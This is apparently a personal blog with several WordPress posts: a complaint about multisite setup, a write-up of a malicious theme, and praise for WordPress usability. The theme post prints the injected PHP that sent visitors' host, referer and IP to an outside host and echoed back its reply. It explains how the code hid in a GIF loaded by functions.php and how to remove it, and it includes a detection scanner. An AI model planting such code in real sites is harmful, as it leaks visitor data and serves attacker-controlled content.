Wordpress 3 and multisite support

I was looking forward to seeing the WP3 multisite system. Unfortunately I had hoped to get one backend administration site for many blogs, where I could mix content between blogs. Multisite support is not for that purpose. It just enables many completely separate blogs to run on a single WP installation. So I could just as well copy my blog folder and database to get the same outcome.

If you are still going to enable the WP3 multisite feature, read the installation instructions very carefully, because the installation settings are not reversible. Pay attention to whether you select a sub-domain or sub-directory installation. I didn’t, and I ended up messing up the installation. Because of that problem my blog was under some sort of attack, or at least a target of spam. I wouldn’t have noticed if my site’s monthly bandwidth transfer hadn’t risen like a stockbroker’s dream.

Blog's traffic stats for last 12 months

The multisite feature installation messed up my blog and enabled some hackers to misuse it.

Luckily I had backup ;)

Warning: URL file-access is disabled in the server configuration

After installing one of the HireWordPressExperts.com themes, I got a warning on my front page that it’s not safe to load a script with file_get_contents() from http://24365online.com/_YTG_yu/_dl/get_info.php?…

The warning pointed me to the general-template.php file, where I found a suspicious script:

/*** HWEDLC ***/

// Builds a remote URL from the visitor's host, referer and IP, fetches it
// and echoes the response straight into the page output.
$url = "http://24365online.com/_YTG_yu/_dl/get_info.php?host=$host&referer=$referer&visitor_ip=$visitor_ip";
$content = file_get_contents($url);
echo $content;

After removing the script and refreshing the browser the warning was gone, but a second refresh brought the same warning back.

I was sure this warning was caused by one of the new theme files, so I tried to search for similar content inside those files. Unfortunately Windows doesn’t index PHP files, but luckily Visual Studio was able to find the file. Surprisingly, the string was found in an image file, wp.gif. Soon I discovered that the functions.php file included wp.gif into the source code. wp.gif was adding additional code into the get_footer function.

In the end the solution was quite simple:

  • Remove wp.gif file
  • Remove the include or require command from functions.php
  • Clean the get_footer function from wp-includes/general-template.php file
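The three indicators in this incident (PHP code inside an image file, a theme file including a non-PHP file, and a remote fetch via file_get_contents()) are easy to check for automatically. The scanner below is an added example, not code from the post or from the theme; it builds a small constructed theme directory that mirrors the incident and reports which files match.

```python
import os
import re
import tempfile

# Indicators drawn from the incident described above.
PHP_OPEN = re.compile(rb"<\?php|<\?=")
NON_PHP_INCLUDE = re.compile(
    rb"\b(include|require)(_once)?\s*\(?\s*[^;]*?\.(gif|png|jpe?g|ico|txt)\b", re.I)
REMOTE_FETCH = re.compile(rb"file_get_contents\s*\(\s*[\"']?https?://", re.I)
IMAGE_EXT = {".gif", ".png", ".jpg", ".jpeg", ".ico"}

def scan_file(path):
    """Return a list of (finding, path) tuples for one file."""
    findings = []
    with open(path, "rb") as fh:
        data = fh.read()
    ext = os.path.splitext(path)[1].lower()
    if ext in IMAGE_EXT and PHP_OPEN.search(data):
        findings.append(("php-code-in-image", path))
    if ext == ".php":
        if NON_PHP_INCLUDE.search(data):
            findings.append(("include-of-non-php-file", path))
        if REMOTE_FETCH.search(data):
            findings.append(("remote-file_get_contents", path))
    return findings

def scan_tree(root):
    """Walk a theme or plugin directory and collect all findings, sorted."""
    results = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            results.extend(scan_file(os.path.join(dirpath, name)))
    return sorted(results)

def build_sample_theme():
    """Constructed sample theme mirroring the incident (not the real theme)."""
    root = tempfile.mkdtemp()
    samples = {
        "wp.gif": b"GIF89a<?php echo 'injected'; ?>",          # PHP hidden in image
        "functions.php": b"<?php include(dirname(__FILE__) . '/wp.gif'); ?>",
        "footer.php": b"<?php echo file_get_contents('http://example.invalid/x'); ?>",
        "style.css": b"/* clean */",                           # should not match
    }
    for name, body in samples.items():
        with open(os.path.join(root, name), "wb") as fh:
            fh.write(body)
    return root

if __name__ == "__main__":
    for kind, path in scan_tree(build_sample_theme()):
        print(kind, path)
```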

I still believe that the script is just an advertisement, but HireWordPressExperts.com could, for example, put an XSS vulnerability into your service or mess up the layout.

Would you hire “experts” that use this kind of marketing strategy?

WordPress surprised me positively

I have only managed to use the WordPress publishing system for 3-4 hours, without any previous experience, and I am still very satisfied with the system. Usability has been polished to perfection in this system and I haven’t run into any problems yet.

I have to say that many have something to learn from this system, at least as far as usability goes.

One of these days I should take a look under the hood and come back to how the system looks from there.